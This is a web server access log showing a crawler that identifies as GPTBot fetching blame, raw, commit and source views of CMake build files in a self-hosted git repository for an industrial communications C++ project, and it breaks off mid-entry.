+[17/Feb/2026:16:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12080] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12081] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10026] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10361] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11323] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11309] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11306] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10268] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10269] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 